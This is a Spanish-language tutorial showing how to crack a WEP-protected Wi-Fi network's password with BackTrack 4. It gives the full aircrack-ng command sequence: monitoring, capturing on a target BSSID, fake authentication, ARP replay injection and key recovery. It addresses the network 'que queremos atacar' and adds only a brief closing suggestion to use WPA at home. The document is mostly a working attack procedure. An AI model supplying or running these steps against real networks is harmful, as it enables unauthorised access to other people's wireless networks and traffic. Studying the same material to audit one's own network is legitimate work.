La seguridad WEP en las redes Wi-Fi es prácticamente inservible debido a los distintos métodos de crackeo existentes. En este tutorial veremos como de la mano de Backtrack Linux podremos obtener la contraseña de una red Wi-Fi en poco mas de 3 minutos.
Lo primero que necesitamos es el backtrack 4 que podemos obtenerlo de:
Lo que descargaremos es una imagen ISO la cual debemos grabar en un DVD, bootear el sistema desde dicho DVD. El usuario es root y la contraseña es toor.
Seleccionamos startx. Abrimos la consola y ejecutamos los siguientes comandos:
airmon-ng
airodump-ng ath0
en este caso:
- BSSID = 00:18:3F:84:37:71
- NAME = WareXone
- CHANNEL = 1
- INTERFACE = ATH0
Así, de acuerdo a la red que queremos atacar quedaría asi:
airodump-ng -w wep -c 1 --bssid 00:18:3F:84:37:71 ath0
Ahora abrimos una nueva consola, e ingresamos lo siguiente tal cual:
aireplay-ng -1 0 –a 00:18:3F:84:37:71 ath0
Si es correcto, nos tiene que aparecer una pantalla como esta, las cinco líneas últimas tal y como aparece en la imagen:
Abrimos una tercera consola e ingresamos:
aireplay-ng -3 -b 00:18:3F:84:37:71 ath0
Ahora volvemos a la primera consola y esperamos a que el #Data alcance por lo menos 3000, volvemos a la tercera consola y presionamos Ctrl+C. Después de detenerla ingresamos el comando dir para que nos liste los archivos en el directorio y luego ingresamos el nombre del ultimo generado (en este caso wep-01):
aircrack-ng wep-01.cap
La clave obtenida es la mostrada pero sin considerar los dos puntos ( : ). Con lo fácil que es romper la seguridad WEP una buena idea es tener nuestra red hogareña usando el estándar WPA. Si algo no les quedó claro pueden ver el siguiente video donde se muestra todo el proceso.
